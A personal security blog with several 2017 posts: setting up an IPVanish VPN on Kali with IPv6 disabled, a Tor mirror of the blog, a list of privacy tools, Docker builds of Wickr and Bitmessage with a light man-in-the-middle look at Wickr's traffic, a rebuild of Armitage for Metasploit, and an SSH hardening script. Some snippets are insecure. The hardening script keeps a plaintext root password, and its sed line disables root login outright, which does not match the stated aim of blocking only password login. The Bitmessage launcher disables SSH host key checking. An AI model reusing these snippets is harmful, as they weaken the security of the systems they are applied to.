c0d3 :: j0rg3

A collection of tips, tricks and snips. A proud Blosxom weblog. All code. No cruft.

Tue, 07 Mar 2017

Privacy Part II: VPN/IPVanish - Install IPVanish on Kali Linux

Okay, so you’re running Whonix, Tails or, at least, TorBrowser.

What’s next? You may wish to consider using a VPN. In simple terms, it offers something similar to what Tor does: you connect to the VPN and your traffic passes through its servers, so the site that you are visiting sees the VPN’s IP address rather than yours. Of course, that also means that you can chain them.

That is: (You)->VPN->Tor->Exit node->Web site

The reason that you might feel compelled to take this step is that a party which is able to see your traffic into and out of Tor could still identify you. The thinking is that the parties who wish to interfere with your privacy could be compelled to run Tor bridges, relays and exit nodes. If traffic from your IP address could be matched to requests coming from the Tor exit node then you could, effectively, be identified.

Some people hold that using a VPN to access Tor does not improve your anonymity. I am not among them. In particular, you will find that IPVanish offers VPN service for under $7 per month and is popular among users of the Tor network. That means that, in addition to IPVanish not logging your traffic, there’s an excellent chance that other users are going from IPVanish into Tor, helping to reduce the uniqueness of your traffic.

By the way, I’d suggest poking around the web a little bit. While their prices are already great, you can find some even deeper discounts: https://signup.ipvanish.com/?aff=vpnfan-promo

IPVanish’s site offers instructions for installing the VPN in Ubuntu so we’re going to take a look at using IPVanish in Kali — including an interesting and unanticipated snag (and, of course, how to fix it).

Let’s grab the OpenVPN configuration:
wget http://www.ipvanish.com/software/configs/ca.ipvanish.com.crt; wget http://www.ipvanish.com/software/configs/ipvanish-US-New-York-nyc-a01.ovpn

We will need the OpenVPN package for Gnome:
apt install network-manager-openvpn-gnome
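
You don’t strictly need the GUI, by the way. The same two files work with the openvpn client straight from the terminal; a minimal sketch (run it from the directory holding both files; it will prompt for your IPVanish credentials if the config asks for them):
openvpn --config ipvanish-US-New-York-nyc-a01.ovpn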

Click on the tray in the upper right corner, then the wrench/screwdriver icon:

Select the ‘Network’ folder icon:

We’re choosing ‘Wired’ (even though we’re using the wlan0 interface):

We’re setting up a VPN, of course:

Import from file:

Choose the configuration file that we downloaded previously:

Enter ‘User name’ and ‘Password’:

We are connected!

Verified at IPVanish’s site: https://www.ipvanish.com/checkIP.php

And this is where I had anticipated the installation instructions would end.

I just wanted to check a few more things. And I would love to tell you that it was simply my thoroughness and unbridled CLI-fu that led me to discover that I was still making ipv6 connections outside of the VPN. It seems this wasn’t noticed by the test at IPVanish because they deal only in ipv4. I was able to prove my ipv6 address and geolocation by using: http://whatismyipaddress.com/

Further, a quick check establishes that the test at IPVanish is not ipv6-aware.
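
One such check (my own suggestion, not from the original post): if their checker had an ipv6 face, its hostname would publish an AAAA record.
host -t A www.ipvanish.com
host -t AAAA www.ipvanish.com
If the second query comes back empty, the checker cannot even be reached over ipv6.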

The easy fix here is to disable ipv6 locally. It is plausible that this could cause unintended consequences and, to be thorough, it would be best to handle your VPN at the firewall. Because IPVanish supports OpenVPN, you’ll be able to get this running with a huge variety of routing/firewall solutions. You can grab any number of tiny computers and build a professional-quality firewall with something like pfSense. Maybe we’ll take a look at getting that configured in a future post.

But, for now, let’s shut down ipv6 in a way that doesn’t involve any grandiose hand-waving magic (i.e., unexplained commands which probably should work) and then test to get confidence in our results.

Let’s use sysctl to find our ipv6 kernel bits and turn them off. Then we’ll load our configuration changes. As a safety, it wouldn’t be a bad idea to look in /etc/sysctl.conf to verify that there aren’t any ipv6 configs in there.

We’ll back up our config file then turn off everything ipv6 by listing every kernel flag containing the words ‘ipv6’ and ‘disable’:
cp /etc/sysctl.conf /etc/$(date +%Y-%m-%d.%H-%M-%S).sysctl.conf.bak && \
sysctl -a | grep -i ipv6 | grep disable | sed 's/ = 0$/ = 1/' >> /etc/sysctl.conf && \
sysctl -p

To explain what we’re doing:
List all kernel flags; show only those containing the string ‘ipv6’; of those that remain, show only those that contain the string ‘disable’:
sysctl -a | grep -i ipv6 | grep disable
Replace the trailing 0 values with 1, to turn ON the disabling, by piping the output through:
sed 's/ = 0$/ = 1/'
That all gets stuck on the end of ‘sysctl.conf’ by redirecting stdout to append to the end of that file:
>> /etc/sysctl.conf
Then we reload with:
sysctl -p
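
As an extra sanity check (my addition, not part of the original steps), we can ask the kernel whether the toggles took and whether any interface still holds an ipv6 address:
sysctl net.ipv6.conf.all.disable_ipv6 net.ipv6.conf.default.disable_ipv6
ip -6 addr show
Both sysctl values should report 1 and the ip command should print nothing.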

Then as a final sanity-check we’ll make sure we can’t find any ipv6 packets sneaking about:
tcpdump -t -n -i wlan0 -s 256 -vv ip6

At this point, assuming our tcpdump doesn’t show any traffic, we should be ipv6-free with all of our ipv4 traffic shipped-off nicely through IPVanish!

Tags: , , , , , , , , , , , , ,
Permalink: 20170307.privacy.vpn.ipvanish

Sat, 04 Mar 2017

Official(ish) deep dark onion code::j0rg3 mirror

Recently I decided that I wanted my blog to be available inside of the Deep, Dark Onion (Tor).

First time around, I set up a proxy that I modified to access only the clear web version of the blog and to make that available inside Tor as a ‘hidden service’.

My blog is hosted on equipment provided by the kind folk at insomnia247.nl and I found that, within a week or so, the address of my proxy was blocked. It’s safe for us to assume that it was simply because of the outrageous popularity it received inside Tor.

By “safe for us to assume” I mean that it is highly probable that no significant harm would come from making that assumption. It would not be a correct assumption, though.

What’s more true is that within Tor things are pretty durn anonymous. Your logs will show Tor traffic coming from the local Tor daemon only. This is a great situation for parties that would like to scan sites repeatedly looking for vulnerabilities — because you can’t block them. They can scan your site over and over and over. And the more features you have (e.g., comments, searches, any form of user input), the more attack vectors are plausible.

So why not scan endlessly? They do. Every minute of every hour.

Since insomnia247 is a provider of free shells, it is incredibly reasonable that they don’t want to take the hit for that volume of traffic. They’re providing this service to untold numbers of other users, blogs and projects.

For that reason, I decided to set up a dedicated mirror.

It works like this: my blog lives here. I have a machine at home which uses rsync to make a local copy of this blog. Immediately thereafter, it rsyncs any newly gotten data up to the mirror in onionland.
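
Boiled down, the home machine’s side is just two rsync calls back to back; something like this sketch (hosts and paths are placeholders, not the real ones):
#!/bin/bash
# pull the latest copy of the blog down from the clear-web host...
rsync -az --delete shellhost:/path/to/blog/ ~/blog-mirror/
# ...then push whatever changed up to the onion mirror's VPS
rsync -az --delete ~/blog-mirror/ onion-vps:/path/to/mirror/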

After consideration, I realized that this was also a better choice just in case there is something exploitable in my blog. Instead of even risking the possibility that an attacker could get access to insomnia247, they can only get to my completely disposable VPS which has hardly anything on it except this blog and a few scripts to which I’ve already opened the source code.

I’ve not finished combing through but I’ve taken efforts to ensure it doesn’t link back to the clear web. To be clear, there’s nothing inherently wrong with that. Tor users will only appear as the IP address of their exit node and should still remain anonymous. To me, it’s just onion etiquette. You let the end-user decide when they want to step outside.

To that end, the Tor mirror does not have the buttons to share to Facebook, Twitter, LinkedIn, Google Plus.

That being said, if you’re a lurker of those Internet back-alleys then you can find the mirror at: http://aacnshdurq6ihmcs.onion

Happy hacking, friends!

Tags: , , , , , , , , , , ,
Permalink: 20170304.deep.dark.onion

Sun, 19 Feb 2017

Privacy: perspective and primer.

Hello friends.

While the overall telos of this blog is to, generally speaking, convey code snippets and inspire the personal projects of others, today we’re going to do something a smidgeon different.

This will be a layman’s look at varied dimensions of information security from a comfortable distance. Over the years, I’ve secured servers, operating systems, medical data, networks, communications and I’ve unsecured many of these same things. The topics are too sprawling to be covered in a quick summary — but let’s find a point of entry.

Those of us who are passionate about information security are well aware of how daunting the situation is. For newcomers, it sometimes seems rather impossible. Pick any subject and there are probably well-informed and convincing experts in diametric equidistance from any “happy medium”.

Let’s imagine that (like most of us) you don’t have anything spectacular to protect. However, you dislike the idea of our ever-dissolving privacy. Therefore you want to encrypt communications. Maybe you begin to use Signal. However, there are criticisms that there is a “backdoor” (there is not). Further, there are accusations that open source projects are coded by those who can’t get real jobs. Conversely, open source projects are widely open for peer review. If it worries one enough they are free to review code themselves.

PGP can encrypt content but concerns surround algorithmic selections. Some are worried about metadata crumbs. Of course, there’s nothing preventing the frequent switching of keys and email addresses. You could use BitMessage, any number of chat solutions or drop at paste bins.

Let’s leave those concerns aside for when you’ve figured out what you’re intending to protect. These arguments surround any subject in information security and we’re not going to investigate them on a case by case basis. Least, not in this post.

At the coarsest granularity, the question is analogous to the practicality of locking your doors or sealing your post envelopes. Should I take measures toward privacy?

My opinion is rather predictable: of course you should!

There’s a very pragmatic explanation. If there ever comes a day when you should like to communicate privately, that’s a terrible time to start learning.

Take the easy road and start using some of the myriad tools and services available.

Should you decide to take InfoSec seriously, you’ll need to define a threat model.
That is: What am I protecting? From whom am I protecting? (e.g. what are probable attack vectors?)

That’s where you need to make choices about trusting products, protocols, methods, algorithms, companies, servers, et cet. Those are all exciting subjects to explore but all too often brushing up against them can be exasperating and cause premature burn-out.

That in mind, let’s employ the philosophy that any effort toward security is better than none and take a look at a few points where one might get their toes wet.

If you have questions or want specific advice, there are several ways below to initiate a secure conversation with me.


Secure your browser:

  • Privacy Badger: Block tracking
  • HTTPS Everywhere: Increase your encryptioning
  • uBlock: Advertisements are for others

    Secure communications:

  • Mailvelope: PGP email encryption for your major webmail provider (e.g., Gmail) | contact | pubkey
  • Tutanota: Encrypted webmail | Kontakt
  • Protonmail: Well-established provider of PGP encrypted webmail, featuring 2FA | kontakta
  • BitMessage: P2P encrypted communications protocol | contact: BM-2D9tDkYEJSTnEkGDKf7xYA5rUj2ihETxVR | Bitmessage channel list
  •   [ Bitmessage in a Docker container ]

  • BitMessage.ch: BitMessage email gateway | contact
  • BitMsg.me: Online BitMessage service
  • Keybase.io: Keybase maps your identity to your public keys, and vice versa
  • Signal: PGP encrypted TXT messages
  • Wire: Encrypted chat, video and calls
  • RIOT: Open-source, IRC-based, Matrix; run your own server
  • Wickr: Encrypted ephemeral chat
  •   [ n.b. Wickr’s .deb package seeks a unicode library (libicu52) which is not available to a recent Kali (or anything) install; .deb file is based on Ubuntu’s 2014 LTS release. Wickr in a Docker container ]


    Explore alternate nets (e.g., Deep Web, Dark Net):

  • MaidSafe: Promising new alt-web project
  • Qubes: a reasonably secure operating system
  • FreeNet: Alt-net based primarily on already knowing with whom you intend to collaborate
  • Bitmask: VPN solution to anonymize your traffic
  • TAILS: A live operating system based on the Tor network
  • TorBrowser: Stand-alone browser for Tor (less secure than TAILS)
  • Whonix: the most secure (and complex) way to access the Tor network
  • i2p: another approach to creating a secure and private alternate web
  • Morph.is: fun alt-net, aimed at producing The World Brain. Although, its future looks a lot less promising since the lead dev was killed.
  • ZeroNet: one more encrypted anonymous net

    Have fun and compute safely!

    Tags: , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , ,
    Permalink: 20170219.privacy.prespective.primer

    Sat, 18 Feb 2017

    The making of a Docker: Part II - Wickr: with bonus analysis

    Recently, I read a rather excited attention-catching piece about how Wickr is the super-secure version of Slack. Attention caught in part because I feel like Wickr has been around for a while. I’d not seen anyone raving about its security in places where I normally interact with those who are highly informed about such subjects.

    The good: it seems the folk at Wickr did a fine job of making sure valuable data aren’t left behind.
    The bad: closed-source, not subject to independent review; crazy marketin’-fancy-talk without a thorough description of how it does what is claimed.
    Any time I’m looking at a product or service that boasts security, I sort of expect to see a threat model.

    [ Update: At the time I was working on this project, the folk at Wickr were, evidently, opening their source. That’s spectacular news! Check it out on Github. ]

    This began as an exercise to provide another piece of security-ish software in a Docker container. Anyone who has used a live distro (e.g., Kali, TAILS) with any regularity knows the ritual of installing favorite tools at each boot, data stores on removable media.

    For me, there is tremendous appeal in reducing that to something like:
    git clone https://github.com/georgeglarson/docker-wickr
    cd docker-wickr

    Let’s dig in!

    Having created a number of Docker containers, my workflow is to queue up the base OS and go through the steps needed to get the software running while keeping careful notes. In this case, I had originally tried to install Wickr on a current copy of Kali. It was already known that Wickr, built against Ubuntu 14.04, needed an older unicode library. So we begin with Ubuntu 14.04.
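
    That scratch-pad step is nothing fancier than (the container name is arbitrary):
    docker run -it --name wickr-scratch ubuntu:14.04 /bin/bash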

    Grab a copy of Wickr and see what’s required:
    dpkg -I wickr-me_2.6.0_amd64.deb

    new debian package, version 2.0.
    size 78890218 bytes: control archive=4813 bytes.
    558 bytes, 14 lines control
    558 bytes, 14 lines control64
    10808 bytes, 140 lines md5sums
    Package: wickr-me
    Architecture: amd64
    Section: net
    Priority: optional
    Version: 2.6.0-4
    Replaces: wickr
    Conflicts: wickr
    Depends: libsqlcipher0, libuuid1, libicu52, libavutil52|libavutil54, libc6, libssl1.0.0, libx264-142, libglib2.0-0, libpulse0, libxrender1, libgl1-mesa-glx
    Recommends: libnotify-bin, gstreamer-plugins0.10-good, gstreamer-plugins0.10-bad, gstreamer-plugins0.10-ugly
    Maintainer: Wickr Inc.
    Installed-Size: 200000
    Description: Secure Internet Chat and Media Exchange agent
    Wickr is a secure communications client

    Okay. The CLI should do most of the work for us, giving a formatted list of dependencies.
    dpkg -I wickr-me_2.6.0_amd64.deb | grep -E "^ Depends: | Recommends: " | sed -e "s/ Depends: //" -e "s/ Recommends: //" -e "s/,//g" -e "s/ / \\\ \n/g"

    libsqlcipher0 \
    libuuid1 \
    libicu52 \
    libavutil54 \
    libc6 \
    libssl1.0.0 \
    libx264-142 \
    libglib2.0-0 \
    libpulse0 \
    libxrender1 \
    libnotify-bin \
    gstreamer-plugins0.10-good \
    gstreamer-plugins0.10-bad \
    gstreamer-plugins0.10-ugly \

    Attempting to get those with apt-get reports that it cannot find the gstreamer bits.

    Let’s find:
    apt-cache search gstreamer | grep -i plugin | grep -E "good|bad|ugly"

    gstreamer0.10-plugins-good - GStreamer plugins from the "good" set
    gstreamer0.10-plugins-bad - GStreamer plugins from the "bad" set
    gstreamer0.10-plugins-ugly - GStreamer plugins from the "ugly" set

    So, there’s the format we need to get the gstreamer dependencies. We know that we’ll also want SSH and wget. That should be enough for our Dockerfile.

    We’ll pull down Wickr:
    wget https://dls.wickr.com/Downloads/wickr-me_2.6.0_amd64.deb

    Then install:
    dpkg -i wickr-me_2.6.0_amd64.deb

    Okay! We are, in theory, ready to run Wickr. We’re about to see we aren’t yet there — but these sorts of problems are pretty commonplace.

    wickr-me: error while loading shared libraries: libxslt.so.1: cannot open shared object file: No such file or directory

    Huh! We need libxslt. Let’s fix that: apt-get install libxslt1-dev

    Now we can run it.

    This application failed to start because it could not find or load the Qt platform plugin "xcb".

    Available platform plugins are: eglfs, linuxfb, minimal, minimalegl, offscreen, xcb.

    Reinstalling the application may fix this problem.
    Aborted (core dumped)

    One more: apt-get install xcb

    Okay. That really was the last one. Now we have a complete list of dependencies for our Dockerfile:
    RUN apt-get update && apt-get install -y \
    gstreamer0.10-plugins-good \
    gstreamer0.10-plugins-bad \
    gstreamer0.10-plugins-ugly \
    libsqlcipher0 \
    libuuid1 \
    libicu52 \
    libavutil52 \
    libc6 \
    libssl1.0.0 \
    libx264-142 \
    libglib2.0-0 \
    libpulse0 \
    libxrender1 \
    libxslt1-dev \
    libgl1-mesa-glx \
    libnotify-bin \
    ssh \
    wget \
    xcb \
    && apt-get clean

    We now have Wickr in a Docker container and, because we are the curious sort, need to peek into what’s happening.

    A natural first step is to set Wireshark atop Wickr. At a glance, it seems to be communicating with a single IP address via HTTPS.

    Unsurprisingly, the client communicates with the server whenever a message is sent. Further, it appears to poll the same address periodically asking for new messages. We see that the address resolves to Rackspace in San Antonio, TX.

    We can easily establish the link between this IP address, Rackspace and the application.

    Well, that’s enough. Right?




    We’re still a little curious.

    Aren’t we?

    I mean, what’s the big question here? What happens if there’s a man in the middle? People so eagerly connect to any free WiFi that it is clearly a plausible scenario. Well… One way to find out!

    Here’s what we learned. Server-side, the application is written in PHP. The IP address corresponds to the name ‘secex.info’.

    When we send, it calls ‘postMessage.php’:

    When we receive, ‘downloadMessage.php’:

    And it calls ‘newMessageCheck.php’ to, y’know, check for new messages.
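
    If you would like a peek without a full packet capture, a plain header probe shows what the server advertises (the path here is stitched together from the names above and may not be exact):
    curl -sI https://secex.info/newMessageCheck.php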

    Other analyses have forensically examined artefacts left behind; there are published descriptions of the encryption methods used for the local database connection. We didn’t go into more aggressive efforts such as disassembly because we are too lazy for that jazz!

    In my opinion, we didn’t learn anything wildly unexpected. Overall, Wickr seems an okay solution for convenient encrypted messaging. That’s always the trade: convenience vs. security. At least we ended up with a Docker container for the software!

    Github | Docker

    Tags: , , ,
    Permalink: 20170218.making.a.docker.wickr

    Fri, 17 Feb 2017

    The making of a Docker: Part I - Bitmessage GUI with SSH X forwarding

    Lately, I’ve been doing a lot of work from a laptop running Kali. Engaged in pursuit of a new job, I’m brushing up on some old tools and skills, exploring some bits that have changed.

    My primary desktop rig is currently running Arch because I love the fine-grained control and the aggressive releases. Over the years, I’ve Gentoo’d and Slacked, Crunchbanged, BSD’d, Solarised, et cet. And I’ve a fondness for all of them, especially the security-minded focus of OpenBSD. But, these days, we’re usually on Arch or Kali. Initially, I went with Black Arch on the laptop but I felt the things I was fixing, and the ways I was fixing them, were too specific to my situation to be good material for posts.

    Anyway, I wanted to get Bitmessage running, corresponding to another post I have in drafts. On Kali, it wasn’t going well so I put it on the Arch box and just ran it over the network. A reasonable solution if you’re in my house but also the sort of solution that will keep a hacker up at night.

    If you’re lucky, there’s someone maintaining a package for the piece of software that you want to run. However, that’s often not the case.

    If I correctly recall, to “fix” the problem with Bitmessage on Kali would’ve required the manual installation of an older version of libraries that were already present. Those libraries should, in fact, be all ebony and ivory, living together in harmony. However, I just didn’t love the idea of that solution. I wanted to find an approach that would be useful on a broader scale.

    Enter containerization/virtualization!

    Wanting the lightest solution, I quickly went to Docker and realized something. I have not before built a Docker container for a GUI application. And Bitmessage’s CLI/daemon mode doesn’t provide the fluid UX that I wanted. Well, the easy way to get a GUI out of a Docker container is to forward DISPLAY as an environment variable (i.e., docker run -e DISPLAY=$DISPLAY). Splendid!

    Except that it doesn’t work on current Kali, which is using QT4. There’s a known issue when graphical apps are run as root and, though it is fixed in QT5, we are using current Kali. And that means we are, by default, uid 0 and QT4.

    I saw a bunch of workarounds that seemed to have spotty (at best) rates of success, including setting QT’s graphics system to Native and giving Xorg over to root. They, mostly, seemed to be cargo cult solutions.

    What made the most sense to my (generally questionable) mind was to use X forwarding. Since I had already been running Bitmessage over X forwarding from my Arch box, I knew it should work just the same.

    To be completely truthful, the first pass I took at this was with Vagrant mostly because it’s SO easy. Bring up your Vagrant Box and then:
    vagrant ssh -- -X

    Having proof of concept, I wanted a Docker container. The reason for this is practical. Vagrant, while completely awesome, has substantially more overhead than Docker because it virtualizes an entire machine, kernel included. We don’t want a separate kernel running for each application. Therefore Docker is the better choice for this project.

    Also, we want this whole thing to be seamless. We want to run the command bitmessage and it should fire up with minimal awkwardness and hopefully no extra steps. That is, we do not want to run the Docker container, then SSH into it and execute Bitmessage as individual steps. Even though that’s going to be how we begin.

    The Bitmessage wiki accurately describes how to install the software so we’ll focus on the SSH setup. Though when we build the Dockerfile we will need to add SSH to the list from the wiki.

    We’re going to want the container to start so that the SSH daemon is ready. Until then we can’t SSH (with X forwarding) into the container. Then we’ll want to use SSH to kick off the Bitmessage application, drawing the graphical interface using our host system’s X11.

    We’re going to take advantage of Docker’s -v --volume option which allows us to specify a directory on our host system to be mounted inside our container. Using this feature, we’ll generate our SSH keys on the host and make them automatically available inside the container. We’ll tuck the keys inside the directory that Bitmessage uses for storing its configuration and data. That way Bitmessage’s configuration and stored messages can be persistent between runs — and all of your pieces are kept in a single place.

    When we generate the container /etc/ssh/sshd_config is configured to allow root login without password only (i.e., using keys). So here’s how we’ll get this done:
    mkdir -p ~/.config/PyBitmessage/keys #Ensure that our data directories exist
    cd ~/.config/PyBitmessage/keys
    ssh-keygen -b 4096 -P "" -C $"$(whoami)@$(hostname)-$(date -I)" -f docker-bitmessage-keys #Generate our SSH keys
    ln -fs docker-bitmessage-keys.pub authorized_keys #for container to see pubkey
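
    The Dockerfile behind the container boils down to the wiki’s dependency list plus an SSH daemon that is listening when the container comes up. A rough sketch (package choices follow the Bitmessage wiki; the sshd wiring shown here is one plausible way to do it, not necessarily the exact published Dockerfile):
    FROM debian:jessie

    # Bitmessage dependencies per the wiki, plus git, sshd and xauth for X forwarding
    RUN apt-get update && apt-get install -y \
        python openssl git python-qt4 python-msgpack openssh-server xauth \
        && apt-get clean

    # sshd wants its run directory; root may log in with keys only
    RUN mkdir -p /var/run/sshd \
        && sed -i 's/^#\?PermitRootLogin.*/PermitRootLogin without-password/' /etc/ssh/sshd_config

    # put PyBitmessage where the launcher script below expects to find it
    WORKDIR /root
    RUN git clone https://github.com/Bitmessage/PyBitmessage

    EXPOSE 22 8444

    # start sshd in the background, then hand control to whatever command was passed
    ENTRYPOINT ["/bin/sh", "-c", "/usr/sbin/sshd && exec \"$@\"", "--"]
    CMD ["bash"]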

    Build our container (sources available at Github and Docker) and we’ll make the script to handle Bitmessage to our preferences.
    #!/bin/bash
    # filename: bitmessage
    set -euxo pipefail

    # open Docker container:
    # port 8444 available, sharing local directories for SSH and Bitmessage data
    # detached, interactive, pseudo-tty (-dit)
    # record container ID in $DID (Docker ID)
    DID=$(docker run -p 8444:8444 -v ~/.config/PyBitmessage/:/root/.config/PyBitmessage -v ~/.config/PyBitmessage/keys/:/root/.ssh/ -dit j0rg3/bitmessage-gui bash)

    # find IP address of new container, record in $DIP (Docker IP)
    DIP=$(docker inspect $DID | grep IPAddress | cut -d '"' -f 4)

    # pause for one second to allow container's SSHD to come online
    sleep 1

    # SSH into container and execute Bitmessage
    ssh -oStrictHostKeyChecking=no -oUserKnownHostsFile=/dev/null -oIdentityFile=~/.config/PyBitmessage/keys/docker-bitmessage-keys -X $DIP ./PyBitmessage/src/bitmessagemain.py

    # close container if Bitmessage is closed
    docker kill $DID

    Okay, let’s make it executable: chmod +x bitmessage

    Put a link to it where it can be picked up system-wide: ln -fs ~/docker-bitmessage/bitmessage /usr/local/bin/bitmessage

    There we have it! We now have a functional Bitmessage inside a Docker container. \o/

    In a future post we’ll look at using eCryptfs to further protect our Bitmessage data stores.

      Project files: Github and Docker

    Tags: , , , , , , , , , , ,
    Permalink: 20170217.making.a.docker.bitmessage

    Tue, 10 Jan 2017

    [-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: RHOSTS.

    Mucking about with a fresh copy of Kali brings to attention that it’s packaged with an Armitage that doesn’t work correctly.

    I know what you’re thinking… Good. Type the commands into Msfconsole like a real man, y’uh lazy good-fer-naught! And, in practice, that was my immediate solution. But I can’t resist a good tinker when things are misbehaving.

    I was anticipating that the problem would be thoroughly solved when I ixquicked it. That was partially correct. Surprised, however, when apt-get update && apt-get upgrade didn’t fix the issue. More surprised at the age of the issue. Most surprised that I could see lots of evidence that users have been plagued by this issue — but no clear workarounds were quickly found.

    Guess what we’re doing today?

    Okay. The issue is quite minor but just enough to be heartbreaking to the fledgling pentester trying to get a VM off the ground.

    In brief, the owner of Armitage’s Github explains:

    The MSF Scans feature in Armitage parses output from Metasploit’s portscan/tcp module and uses these results to build a list of targets it should run various Metasploit auxiliary modules against. A recent-ish update to the Metasploit Framework changed the format of the portscan/tcp module output. A patch to fix this issue just needs to account for the new format of the portscan/tcp module.

    That is, a colon makes it into the input for the Msfconsole command to define RHOSTS. I.e.: set RHOSTS -

    Another kind coder tweaked the regex and submitted the patch and pull request, which was successfully incorporated into the project.

    Sadly, things have stalled out there. So if this problem is crippling your rig, let’s fix it!

    We just want a fresh copy of the project.
    root@kali:~/armitage# git clone https://github.com/rsmudge/armitage

    Cloning into ‘armitage’…
    remote: Counting objects: 7564, done.
    remote: Total 7564 (delta 0), reused 0 (delta 0), pack-reused 7564
    Receiving objects: 100% (7564/7564), 47.12 MiB | 2.91 MiB/s, done.
    Resolving deltas: 100% (5608/5608), done.

    Kali is Debian-based and we’re going to need Apache Ant:
    root@kali:~/armitage# apt-get install ant

    Then, we’ll build our new fella:
    root@kali:~/armitage# cd armitage
    root@kali:~/armitage# ./package.sh

    Buildfile: /root/test/armitage/build.xml


    Total time: 0 seconds
    Buildfile: /root/test/armitage/build.xml

    [mkdir] Created dir: /root/test/armitage/bin

    [javac] Compiling 111 source files to /root/test/armitage/bin
    [javac] depend attribute is not supported by the modern compiler
    [javac] Note: /root/test/armitage/src/ui/MultiFrame.java uses or overrides a deprecated API.
    [javac] Note: Recompile with -Xlint:deprecation for details.
    [javac] Note: Some input files use unchecked or unsafe operations.
    [javac] Note: Recompile with -Xlint:unchecked for details.

    Total time: 2 seconds
    Buildfile: /root/test/armitage/build.xml



    [unzip] Expanding: /root/test/armitage/lib/sleep.jar into /root/test/armitage/bin
    [unzip] Expanding: /root/test/armitage/lib/jgraphx.jar into /root/test/armitage/bin
    [unzip] Expanding: /root/test/armitage/lib/msgpack-0.6.12-devel.jar into /root/test/armitage/bin
    [unzip] Expanding: /root/test/armitage/lib/postgresql-9.1-901.jdbc4.jar into /root/test/armitage/bin
    [unzip] Expanding: /root/test/armitage/lib/javassist-3.15.0-GA.jar into /root/test/armitage/bin
    [copy] Copying 4 files to /root/test/armitage/bin/scripts-cortana
    [jar] Building jar: /root/test/armitage/armitage.jar
    [jar] Building jar: /root/test/armitage/cortana.jar

    Total time: 1 second
    adding: readme.txt (deflated 55%)
    adding: armitage.exe (deflated 49%)
    adding: cortana.jar (deflated 5%)
    adding: armitage.jar (deflated 5%)
    adding: whatsnew.txt (deflated 65%)
    Archive: ../../armitage.zip
    inflating: readme.txt
    inflating: armitage.exe
    inflating: cortana.jar
    inflating: armitage.jar
    inflating: whatsnew.txt

    And here, best I can guess from messages read, is where a lot of people are running into trouble. We have successfully produced our new working copy of armitage. However, it is in our own local directory and will not be run if we just enter the command: armitage

    Let’s review how to figure out what we want to do about that.

    First, we want to verify what happens when we run the command armitage.
    root@kali:~/armitage# which armitage
    /usr/bin/armitage
    Good! Let’s check and see what that does!
    root@kali:~/armitage# head /usr/bin/armitage


    cd /usr/share/armitage/
    exec ./armitage “$@”

    Almost there! It’s running /usr/share/armitage/armitage with whatever variables we’ve passed in. We’ll check that out.
    root@kali:~/armitage# head /usr/share/armitage/armitage

    java -XX:+AggressiveHeap -XX:+UseParallelGC -jar armitage.jar $@

    We have enough information to assemble a solution.

    I trust that the people behind Kali and Armitage will get this corrected so I don’t want to suggest a solution that would replace the armitage command and prevent an updated version from running later. So, let’s just make a temporary replacement?

    root@kali:~/armitage# echo -e '#!/bin/sh\njava -XX:+AggressiveHeap -XX:+UseParallelGC -jar ~/armitage/armitage.jar $@' > /usr/bin/tmparmitage

    Hereafter, we can use the command ‘tmparmitage’ (either CLI or ALT-F2) to run our fresh version until things catch up.

    And, of course, to save you the time, weary hacker:

    Download here:

    Tags: , , , , , , ,
    Permalink: 20170110.armitage.not.working.in.kali

    Mon, 02 Jan 2017

    Securing a new server

    Happy new year! New year means new servers, right?

    That provides its own set of interesting circumstances!

    The server we’re investigating in this scenario was chosen for being a dedicated box in a country that has quite tight privacy laws. And it was a great deal offered on LEB.

    So herein is the fascinating bit. The rig took a few days for the provider to set up and, upon completion, the password for SSHing into the root account was emailed out. (o_0)

    Viewed with security in mind, that means that there was a window of opportunity for bad guys to work on guessing the password before its owner even tuned in. That window remains open until the server is better secured. Luckily, there was a nice interface for reinstalling the OS, permitting its purchaser to select a password.

    My preferred approach was to script the basic lock-down so that we can reinstall the base OS and immediately start closing gaps.

    In order:

  • Set up SSH keys (scripted)
  • Disable password usage for root (scripted)
  • Install and configure IPset (scripted. details in next post)
  • Install and configure fail2ban
  • Install and configure PortSentry

    In this post, we’re focused on the first two steps.

    The tasks to be handled are:

  • Generate keys
  • Configure local SSH to use key
  • Transmit key to target server
  • Disable usage of password for ‘root’ account

    We’ll use ssh-keygen to generate a key — and stick with RSA for ease. If you’d prefer ECC then you’re probably reading the wrong blog but feel encouraged to contact me privately.

    The code:

    #configure variables (remote_host and local_filename are placeholders; set them for your server)
    remote_host="203.0.113.10"
    remote_user="root"
    remote_pass="thisisaratheraquitecomplicatedpasswordbatterystaple" # https://xkcd.com/936/
    local_user=$(whoami)
    local_host=$(hostname)
    local_date=`date -I`
    local_filename="$HOME/.ssh/${remote_host}_rsa"

    #generate key without passphrase
    ssh-keygen -b 4096 -P "" -C $local_user@$local_host-$local_date -f $local_filename

    #add reference to generated key to local configuration
    printf '%s\n' "Host $remote_host" "IdentityFile $local_filename" >> ~/.ssh/config

    #copy key to remote host
    sshpass -p $remote_pass ssh-copy-id $remote_user@$remote_host

    #disable password for root on remote
    ssh $remote_user@$remote_host "cp /etc/ssh/sshd_config /etc/ssh/sshd_config.bak && sed -i '0,/PermitRootLogin/s/PermitRootLogin yes/PermitRootLogin no/' /etc/ssh/sshd_config"

    We just run this script as soon as the OS is reinstalled and we’re substantially safer. Since it’s a Deb8 install, quickly pulling down fail2ban and PortSentry makes things quite a lot tighter.
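
    Once it has run, it’s worth proving the lock-out actually took (remote_host standing in for the same variable used above):
    ssh -o PubkeyAuthentication=no -o PreferredAuthentications=password root@$remote_host  # should now be refused
    ssh root@$remote_host 'echo key-based login still works'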

    In another post, we’ll visit the 2017 version of making a DIY script to batten the hatches using a variety of publicly provided blocklists.

    Download here:

    Tags: , , , ,
    Permalink: 20170102.securing.a.new.server

    Tue, 20 Dec 2016

    Kicking the Crypto-tires

    Some time ago I had begun work on my own Pastebin-type project with a few goals. Basically, I wanted to eat all the cakes — and have them too.

  • Both an online user interface and efficient CLI usage
  • Messages encrypted immediately such that database access does not provide one with the contents of the messages
  • Messages capable of self-destructing
  • Database schema that would allow rebuilding the user/message relationship, provided the same password but would not store those relationships
  • Also, JavaScript encryption to appeal to users who don’t know much about cryptography but would like to try

    The project, honestly, was going swimmingly when derailed by the goings-on of life.

    One of the interesting components of the project was, of course, choosing crypto implementations. There are known shortcomings to handling it in JS but that’s still the most convenient option for some users. Outside of the browser, server-side, you have all the same questions about which solution is best. Which protocol(s) should be available?

